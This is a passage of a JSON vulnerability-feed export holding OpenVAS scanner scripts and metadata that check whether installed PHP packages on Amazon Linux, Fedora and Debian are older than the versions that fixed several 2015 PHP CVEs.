Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"php54-enchant\", rpm:\"php54-enchant~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-mssql\", rpm:\"php54-mssql~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-mbstring\", rpm:\"php54-mbstring~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-pdo\", rpm:\"php54-pdo~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-gd\", rpm:\"php54-gd~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-pgsql\", rpm:\"php54-pgsql~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-mysql\", rpm:\"php54-mysql~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-odbc\", rpm:\"php54-odbc~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-soap\", rpm:\"php54-soap~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-embedded\", rpm:\"php54-embedded~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-imap\", rpm:\"php54-imap~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-bcmath\", rpm:\"php54-bcmath~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-process\", rpm:\"php54-process~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-recode\", rpm:\"php54-recode~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-mysqlnd\", rpm:\"php54-mysqlnd~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-fpm\", rpm:\"php54-fpm~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-xmlrpc\", rpm:\"php54-xmlrpc~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-mcrypt\", rpm:\"php54-mcrypt~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-snmp\", rpm:\"php54-snmp~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-tidy\", rpm:\"php54-tidy~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-cli\", rpm:\"php54-cli~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-intl\", rpm:\"php54-intl~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-dba\", rpm:\"php54-dba~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-debuginfo\", rpm:\"php54-debuginfo~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-ldap\", rpm:\"php54-ldap~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-xml\", rpm:\"php54-xml~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-pspell\", rpm:\"php54-pspell~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-devel\", rpm:\"php54-devel~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-common\", rpm:\"php54-common~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54\", rpm:\"php54~5.4.41~1.69.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-02T14:30:01", "references": ["https://alas.aws.amazon.com/ALAS-2015-535.html"], "pluginID": "1361412562310120225", "description": "Amazon Linux Local Security Checks", "edition": 5, "reporter": "Eero Volotinen", "published": "2015-09-08T00:00:00", "title": "Amazon Linux Local Check: alas-2015-535", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Amazon Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "modified": "2018-10-01T00:00:00", "id": "OPENVAS:1361412562310120225", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120225", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2015-535.nasl 6600 2017-07-07 09:58:31Z teissa$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120225\");\n script_version(\"$Revision: 11711 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:20:51 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 14:30:57 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: alas-2015-535\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in PHP. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update php55 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-535.html\");\n script_cve_id(\"CVE-2015-4021\", \"CVE-2015-4022\", \"CVE-2015-4025\", \"CVE-2015-4024\", \"CVE-2015-4026\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"php55-xml\", rpm:\"php55-xml~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-soap\", rpm:\"php55-soap~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-dba\", rpm:\"php55-dba~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-imap\", rpm:\"php55-imap~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-pspell\", rpm:\"php55-pspell~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-gd\", rpm:\"php55-gd~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-intl\", rpm:\"php55-intl~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-opcache\", rpm:\"php55-opcache~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-tidy\", rpm:\"php55-tidy~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-fpm\", rpm:\"php55-fpm~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-mssql\", rpm:\"php55-mssql~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-enchant\", rpm:\"php55-enchant~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-mysqlnd\", rpm:\"php55-mysqlnd~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-cli\", rpm:\"php55-cli~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-pdo\", rpm:\"php55-pdo~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55\", rpm:\"php55~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-devel\", rpm:\"php55-devel~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-snmp\", rpm:\"php55-snmp~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-xmlrpc\", rpm:\"php55-xmlrpc~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-mcrypt\", rpm:\"php55-mcrypt~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-recode\", rpm:\"php55-recode~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-common\", rpm:\"php55-common~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-bcmath\", rpm:\"php55-bcmath~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-debuginfo\", rpm:\"php55-debuginfo~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-embedded\", rpm:\"php55-embedded~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-odbc\", rpm:\"php55-odbc~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-mbstring\", rpm:\"php55-mbstring~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-ldap\", rpm:\"php55-ldap~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-pgsql\", rpm:\"php55-pgsql~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-gmp\", rpm:\"php55-gmp~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-process\", rpm:\"php55-process~5.5.25~1.101.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:49:16", "references": ["2015-8281", "https://lists.fedoraproject.org/pipermail/package-announce/2015-May/158616.html"], "pluginID": "1361412562310869623", "description": "Check the version of php", "edition": 5, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-07-07T00:00:00", "title": "Fedora Update for php FEDORA-2015-8281", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-7243", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:1361412562310869623", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869623", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2015-8281\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869623\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-07 06:29:29 +0200 (Tue, 07 Jul 2015)\");\n script_cve_id(\"CVE-2006-7243\", \"CVE-2015-4024\", \"CVE-2015-4022\", \"CVE-2015-4021\",\n \"CVE-2015-4025\", \"CVE-2015-4026\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for php FEDORA-2015-8281\");\n script_tag(name: \"summary\", value: \"Check the version of php\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"PHP is an HTML-embedded scripting language.\nPHP attempts to make it easy for developers to write dynamically generated web\npages. PHP also offers built-in database integration for several commercial and\nnon-commercial database management systems, so writing a database-enabled\nwebpage with PHP is fairly simple. The most common use of PHP coding is probably\nas a replacement for CGI scripts.\n\nThe php package contains the module (often referred to as mod_php) which adds\nsupport for the PHP language to Apache HTTP Server.\n\");\n script_tag(name: \"affected\", value: \"php on Fedora 22\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2015-8281\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-May/158616.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.6.9~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:51:23", "references": ["2015-8383", "https://lists.fedoraproject.org/pipermail/package-announce/2015-May/158915.html"], "pluginID": "1361412562310869430", "description": "Check the version of php", "edition": 4, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-06-09T00:00:00", "title": "Fedora Update for php FEDORA-2015-8383", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-7243", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:1361412562310869430", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869430", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2015-8383\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869430\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-09 10:57:38 +0200 (Tue, 09 Jun 2015)\");\n script_cve_id(\"CVE-2006-7243\", \"CVE-2015-4024\", \"CVE-2015-4025\", \"CVE-2015-4022\",\n \"CVE-2015-4026\", \"CVE-2015-4021\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for php FEDORA-2015-8383\");\n script_tag(name: \"summary\", value: \"Check the version of php\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"PHP is an HTML-embedded scripting language.\nPHP attempts to make it easy for developers to write dynamically generated web\npages. PHP also offers built-in database integration for several commercial and\nnon-commercial database management systems, so writing a database-enabled webpage\nwith PHP is fairly simple. The most common use of PHP coding is probably as a\nreplacement for CGI scripts.\n\nThe php package contains the module (often referred to as mod_php) which adds\nsupport for the PHP language to Apache HTTP Server.\n\");\n script_tag(name: \"affected\", value: \"php on Fedora 21\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2015-8383\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-May/158915.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.6.9~1.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:52:36", "references": ["http://www.debian.org/security/2015/dsa-3280.html"], "pluginID": "1361412562310703280", "description": "Multiple vulnerabilities have been discovered in PHP:\n\nCVE-2015-4025 /\nCVE-2015-4026 \nMultiple function didn", "edition": 3, "reporter": "Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net", "published": "2015-06-07T00:00:00", "title": "Debian Security Advisory DSA 3280-1 (php5 - security update)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2783", "CVE-2015-3329", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310703280", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703280", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3280.nasl 9355 2018-04-06 07:16:07Z cfischer $\n# Auto-generated from advisory DSA 3280-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703280\");\n script_version(\"$Revision: 9355 $\");\n script_cve_id(\"CVE-2015-2783\", \"CVE-2015-3329\", \"CVE-2015-4021\", \"CVE-2015-4022\",\n \"CVE-2015-4024\", \"CVE-2015-4025\", \"CVE-2015-4026\");\n script_name(\"Debian Security Advisory DSA 3280-1 (php5 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-04-06 09:16:07 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name: \"creation_date\", value: \"2015-06-07 00:00:00 +0200 (Sun, 07 Jun 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3280.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"php5 on Debian Linux\");\n script_tag(name: \"insight\", value: \"This package is a metapackage that, when installed, guarantees that you\nhave at least one of the four server-side versions of the PHP5 interpreter\ninstalled. Removing this package won't remove PHP5 from your system, however\nit may remove other packages that depend on this one.\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution (wheezy), these problems have been fixed\nin version 5.4.41-0+deb7u1.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.6.9+dfsg-0+deb8u1.\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 5.6.9+dfsg-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 5.6.9+dfsg-1.\n\nWe recommend that you upgrade your php5 packages.\");\n script_tag(name: \"summary\", value: \"Multiple vulnerabilities have been discovered in PHP:\n\nCVE-2015-4025 /\nCVE-2015-4026 \nMultiple function didn't check for NULL bytes in path names.\n\nCVE-2015-4024 \nDenial of service when processing multipart/form-data requests.\n\nCVE-2015-4022 \nInteger overflow in the ftp_genlist() function may result in\ndenial of service or potentially the execution of arbitrary code.\n\nCVE-2015-4021 CVE-2015-3329 CVE-2015-2783 \nMultiple vulnerabilities in the phar extension may result in\ndenial of service or potentially the execution of arbitrary code\nwhen processing malformed archives.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libphp5-embed\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", 